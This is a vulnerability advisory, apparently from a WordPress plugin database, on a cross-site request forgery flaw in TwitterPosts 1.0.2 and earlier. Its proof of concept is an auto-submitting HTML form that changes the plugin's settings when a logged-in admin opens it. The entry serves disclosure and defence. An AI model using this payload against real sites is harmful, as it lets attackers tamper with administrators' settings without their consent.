TwitterPosts <= 1.0.2 – Settings Update via CSRF | CVE 2023-7297 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

Make an admin open an HTML file containing:

```
<form action="https://example.com/wp-admin/options-general.php?page=twitterposts" method="POST">
    <input type="text" name="twitterposts-config-string" value="hacked">
    <input type="text" name="twitterposts-config-string-save" value="Save">
</form>
<script>
    document.forms[0].submit();
</script>
```

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://magos-securitas.com

Verified

Yes

WPVDB ID

3632dfa1-2948-4622-a8fd-31edb8b22383

Timeline

Publicly Published

2023-11-13 (about 2 years ago)

Added

2024-11-22 (about 1 year ago)

Last Updated

2024-11-22 (about 1 year ago)

Other

Published

Title

Published

2014-08-01

Title

WP-SendSMS - Setting Manipulation Cross-Site Request Forgery (CSRF)

Published

2023-12-28

Title

Affiliates Manager < 2.9.32 - Cross-Site Request Forgery via multiple AJAX actions

Published

2024-04-05

Title

WordPress Comments Import & Export < 2.3.6 - Cross-Site Request Forgery

Published

2025-02-13

Title

Bootstrap collapse <= 1.0.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-05-09

Title

Social Sharing Plugin – Social Warfare < 4.4.6 - Cross-Site Request Forgery